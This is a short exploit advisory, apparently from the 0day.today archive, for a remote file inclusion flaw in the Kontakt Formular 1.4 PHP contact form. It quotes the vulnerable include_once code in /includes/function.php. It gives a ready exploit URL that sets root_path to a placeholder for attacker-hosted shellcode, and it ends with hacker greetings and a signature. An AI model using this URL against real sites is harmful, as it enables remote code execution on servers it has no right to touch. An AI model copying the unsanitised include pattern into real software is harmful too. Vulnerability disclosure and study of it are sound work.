Kontakt Formular 1.4 Remote File Inclusion Vulnerability

2007-12-30T00:00:00
ID 1337DAY-ID-2422
Type zdt
Reporter bd0rk
Modified 2007-12-30T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ========================================================
Kontakt Formular 1.4 Remote File Inclusion Vulnerability
========================================================




                   ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                   +                                                          +
                   + Kontakt Formular 1.4 Remote File Inclusion Vulnerability +
                   +                                                          +
                   +                  Discovered by bd0rk                     +
                   +                                                          +
                   ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



Vendor: http://www.mapos-scripts.de

Download: http://www.mapos-scripts.de/download,5.html

Vulnerable Code in /includes/function.php

-------------------------------------------------------------------

<?php
@session_start();

$datei_path = $datei_path ? $datei_path : $root_path."/index.php";
$datei_path = htmlentities($datei_path);
$kontakt_config=array();
include_once($root_path.'/includes/config.php');

-------------------------------------------------------------------

[+]Exploit: http://[target]/[path]/includes/function.php?root_path=[Shellcode]


Greetings: str0ke, TheJT, Luna-Tic, DNX


####The 19 years old german Hacker bd0rk####



#  0day.today [2018-01-03]  #